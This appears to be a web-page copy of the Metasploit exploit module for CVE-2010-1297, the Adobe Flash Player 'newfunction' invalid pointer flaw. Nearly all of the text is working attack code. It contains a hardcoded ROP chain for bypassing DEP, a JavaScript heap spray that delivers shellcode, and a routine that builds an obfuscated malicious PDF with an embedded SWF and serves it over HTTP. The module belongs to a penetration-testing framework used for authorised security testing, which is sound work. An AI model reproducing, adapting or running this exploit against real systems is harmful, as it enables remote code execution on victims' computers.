Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
19566 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'zlib'
7
8
class MetasploitModule < Msf::Exploit::Remote
9
Rank = NormalRanking
10
11
include Msf::Exploit::Remote::HttpServer::HTML
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
18
'Description' => %q{
19
This module exploits a vulnerability in the DoABC tag handling within
20
versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
21
vulnerable, as are any other applications that may embed Flash player.
22
23
Arbitrary code execution is achieved by embedding a specially crafted Flash
24
movie into a PDF document. An AcroJS heap spray is used in order to ensure
25
that the memory used by the invalid pointer issue is controlled.
26
27
NOTE: This module uses a similar DEP bypass method to that used within the
28
adobe_libtiff module. This method is unlikely to work across various
29
Windows versions due a hardcoded syscall number.
30
},
31
'License' => MSF_LICENSE,
32
'Author' => [
33
'Unknown', # Found being openly exploited
34
'jduck' # Metasploit version
35
],
36
'References' => [
37
['CVE', '2010-1297'],
38
['OSVDB', '65141'],
39
['BID', '40586'],
40
['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
41
# For SWF->PDF embedding
42
['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
43
],
44
'DefaultOptions' => {
45
'EXITFUNC' => 'process',
46
'HTTP::compression' => 'gzip',
47
'HTTP::chunked' => true,
48
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
49
},
50
'Payload' => {
51
'Space' => 1000,
52
'BadChars' => "\x00",
53
'DisableNops' => true
54
},
55
'Platform' => 'win',
56
'Targets' => [
57
# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
58
# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
59
# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
60
[ 'Automatic', {}],
61
],
62
'DisclosureDate' => '2010-06-04',
63
'DefaultTarget' => 0,
64
'Notes' => {
65
'Reliability' => UNKNOWN_RELIABILITY,
66
'Stability' => UNKNOWN_STABILITY,
67
'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
}
69
)
70
)
71
end
72
73
def exploit
74
# load the static swf file
75
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")
76
fd = File.open(path, "rb")
77
@swf_data = fd.read(fd.stat.size)
78
fd.close
79
80
super
81
end
82
83
def on_request_uri(cli, request)
84
print_status("Sending crafted PDF w/SWF")
85
86
js_data = make_js(regenerate_payload(cli).encoded)
87
pdf_data = make_pdf(@swf_data, js_data)
88
send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })
89
90
# Handle the payload
91
handler(cli)
92
end
93
94
def make_js(encoded_payload)
95
# The following executes a ret2lib using BIB.dll
96
# The effect is to bypass DEP and execute the shellcode in an indirect way
97
stack_data = [
98
0xc0c0c0c,
99
0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
100
0xcccccccc,
101
0x70048ef, # xchg eax,esp / ret
102
0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
103
0xcccccccc,
104
0x7009084, # ret
105
0x7009084, # ret
106
0x7009084, # ret
107
0x7009084, # ret
108
0x7009084, # ret
109
0x7009084, # ret
110
0x7009033, # ret 0x18
111
0x7009084, # ret
112
0xc0c0c0c,
113
0x7009084, # ret
114
0x7009084, # ret
115
0x7009084, # ret
116
0x7009084, # ret
117
0x7009084, # ret
118
0x7009084, # ret
119
0x7009084, # ret
120
0x7009084, # ret
121
0x7001599, # pop ebp / ret
122
0x10124,
123
0x70072f7, # pop eax / ret
124
0x10104,
125
0x70015bb, # pop ecx / ret
126
0x1000,
127
0x700154d, # mov [eax], ecx / ret
128
0x70015bb, # pop ecx / ret
129
0x7ffe0300, # -- location of KiFastSystemCall
130
0x7007fb2, # mov eax, [ecx] / ret
131
0x70015bb, # pop ecx / ret
132
0x10011,
133
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
134
0x70015bb, # pop ecx / ret
135
0x10100,
136
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
137
0x70072f7, # pop eax / ret
138
0x10011,
139
0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
140
0x7005c54, # pop esi / add esp,0x14 / ret
141
0xffffffff,
142
0x10100,
143
0x0,
144
0x10104,
145
0x1000,
146
0x40,
147
# The next bit effectively copies data from the interleaved stack to the memory
148
# pointed to by eax
149
# The data copied is:
150
# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
151
# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
152
# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
153
0x700d731, # mov eax, [ebp-0x24] / ret
154
0x70015bb, # pop ecx / ret
155
0x9054905a,
156
0x700154d, # mov [eax], ecx / ret
157
0x700a722, # add eax, 4 / ret
158
0x70015bb, # pop ecx / ret
159
0x5815eb5a,
160
0x700154d, # mov [eax], ecx / ret
161
0x700a722, # add eax, 4 / ret
162
0x70015bb, # pop ecx / ret
163
0x18891a8b,
164
0x700154d, # mov [eax], ecx / ret
165
0x700a722, # add eax, 4 / ret
166
0x70015bb, # pop ecx / ret
167
0x8304c083,
168
0x700154d, # mov [eax], ecx / ret
169
0x700a722, # add eax, 4 / ret
170
0x70015bb, # pop ecx / ret
171
0xfb8104c2,
172
0x700154d, # mov [eax], ecx / ret
173
0x700a722, # add eax, 4 / ret
174
0x70015bb, # pop ecx / ret
175
0xc0c0c0c,
176
0x700154d, # mov [eax], ecx / ret
177
0x700a722, # add eax, 4 / ret
178
0x70015bb, # pop ecx / ret
179
0x5ebee75,
180
0x700154d, # mov [eax], ecx / ret
181
0x700a722, # add eax, 4 / ret
182
0x70015bb, # pop ecx / ret
183
0xffffe6e8,
184
0x700154d, # mov [eax], ecx / ret
185
0x700a722, # add eax, 4 / ret
186
0x70015bb, # pop ecx / ret
187
0x909090ff,
188
0x700154d, # mov [eax], ecx / ret
189
0x700a722, # add eax, 4 / ret
190
0x70015bb, # pop ecx / ret
191
0x90909090,
192
0x700154d, # mov [eax], ecx / ret
193
0x700a722, # add eax, 4 / ret
194
0x70015bb, # pop ecx / ret
195
0x90909090,
196
0x700154d, # mov [eax], ecx / ret
197
0x700a722, # add eax, 4 / ret
198
0x70015bb, # pop ecx / ret
199
0x90ffffff,
200
0x700154d, # mov [eax], ecx / ret
201
0x700d731, # mov eax, [ebp-0x24] / ret
202
0x700112f # call eax -- (execute stub to transition to full shellcode)
203
].pack('V*')
204
205
var_unescape = rand_text_alpha(rand(100) + 1)
206
var_shellcode = rand_text_alpha(rand(100) + 1)
207
208
var_start = rand_text_alpha(rand(100) + 1)
209
210
var_s = 0x10000
211
var_c = rand_text_alpha(rand(100) + 1)
212
var_b = rand_text_alpha(rand(100) + 1)
213
var_d = rand_text_alpha(rand(100) + 1)
214
var_3 = rand_text_alpha(rand(100) + 1)
215
var_i = rand_text_alpha(rand(100) + 1)
216
var_4 = rand_text_alpha(rand(100) + 1)
217
218
payload_buf = ''
219
payload_buf << stack_data
220
payload_buf << encoded_payload
221
222
escaped_payload = Rex::Text.to_unescape(payload_buf)
223
224
js = %Q|
225
var #{var_unescape} = unescape;
226
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
227
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
228
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
229
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
230
#{var_b} += #{var_shellcode};
231
#{var_b} += #{var_c};
232
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
233
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
234
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
235
var #{var_4} = new Array();
236
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
237
|
238
239
js
240
end
241
242
def random_non_ascii_string(count)
243
result = ""
244
count.times do
245
result << (rand(128) + 128).chr
246
end
247
result
248
end
249
250
def io_def(id)
251
"%d 0 obj\n" % id
252
end
253
254
def io_ref(id)
255
"%d 0 R" % id
256
end
257
258
# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
259
def n_obfu(str)
260
result = ""
261
str.scan(/./u) do |c|
262
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
263
result << "#%x" % c.unpack("C*")[0]
264
else
265
result << c
266
end
267
end
268
result
269
end
270
271
def ascii_hex_whitespace_encode(str)
272
result = ""
273
whitespace = ""
274
str.each_byte do |b|
275
result << whitespace << "%02x" % b
276
whitespace = " " * (rand(3) + 1)
277
end
278
result << ">"
279
end
280
281
def make_pdf(swf, js)
282
swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
283
284
xref = []
285
eol = "\n"
286
endobj = "endobj" << eol
287
288
# Randomize PDF version?
289
pdf = "%PDF-1.5" << eol
290
# pdf << "%" << random_non_ascii_string(4) << eol
291
292
# catalog
293
xref << pdf.length
294
pdf << io_def(1) << n_obfu("<</Type/Catalog")
295
pdf << n_obfu("/Pages ") << io_ref(3)
296
pdf << n_obfu("/OpenAction ") << io_ref(5)
297
pdf << n_obfu(">>")
298
pdf << eol << endobj
299
300
# pages array
301
xref << pdf.length
302
pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj
303
304
# page 1
305
xref << pdf.length
306
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
307
pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
308
pdf << n_obfu(">>")
309
pdf << eol << endobj
310
311
# js action
312
xref << pdf.length
313
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj
314
315
# js stream
316
xref << pdf.length
317
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
318
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
319
pdf << "stream" << eol
320
pdf << compressed << eol
321
pdf << "endstream" << eol
322
pdf << endobj
323
324
# swf annotation object
325
xref << pdf.length
326
pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
327
pdf << n_obfu("/Rect [20 20 187 69] ")
328
pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
329
pdf << n_obfu("/RichMediaContent ") << io_ref(9)
330
pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
331
pdf << n_obfu(">>")
332
pdf << eol << endobj
333
334
# rich media settings
335
xref << pdf.length
336
pdf << io_def(8)
337
pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
338
pdf << n_obfu("/Activation ") << io_ref(10)
339
pdf << n_obfu("/Deactivation ") << io_ref(11)
340
pdf << n_obfu(">>")
341
pdf << eol << endobj
342
343
# rich media content
344
xref << pdf.length
345
pdf << io_def(9)
346
pdf << n_obfu("<</Type/RichMediaContent")
347
pdf << n_obfu("/Assets ") << io_ref(12)
348
pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
349
pdf << n_obfu(">>")
350
pdf << eol << endobj
351
352
# rich media activation / deactivation
353
xref << pdf.length
354
pdf << io_def(10)
355
pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
356
pdf << eol << endobj
357
358
xref << pdf.length
359
pdf << io_def(11)
360
pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
361
pdf << eol << endobj
362
363
# rich media assets
364
xref << pdf.length
365
pdf << io_def(12)
366
pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
367
pdf << eol << endobj
368
369
# swf embeded file ref
370
xref << pdf.length
371
pdf << io_def(13)
372
pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
373
pdf << eol << endobj
374
375
# rich media configuration
376
xref << pdf.length
377
pdf << io_def(14)
378
pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
379
pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
380
pdf << eol << endobj
381
382
# rich media isntance
383
xref << pdf.length
384
pdf << io_def(15)
385
pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
386
pdf << n_obfu("/Asset ") << io_ref(13)
387
pdf << n_obfu(">>")
388
pdf << eol << endobj
389
390
# swf stream
391
# NOTE: This data is already compressed, no need to compress it again...
392
xref << pdf.length
393
pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
394
pdf << "stream" << eol
395
pdf << swf << eol
396
pdf << "endstream" << eol
397
pdf << endobj
398
399
# trailing stuff
400
xrefPosition = pdf.length
401
pdf << "xref" << eol
402
pdf << "0 %d" % (xref.length + 1) << eol
403
pdf << "0000000000 65535 f" << eol
404
xref.each do |index|
405
pdf << "%010d 00000 n" % index << eol
406
end
407
408
pdf << "trailer" << eol
409
pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
410
411
pdf << "startxref" << eol
412
pdf << xrefPosition.to_s() << eol
413
414
pdf << "%%EOF" << eol
415
pdf
416
end
417
end
418
419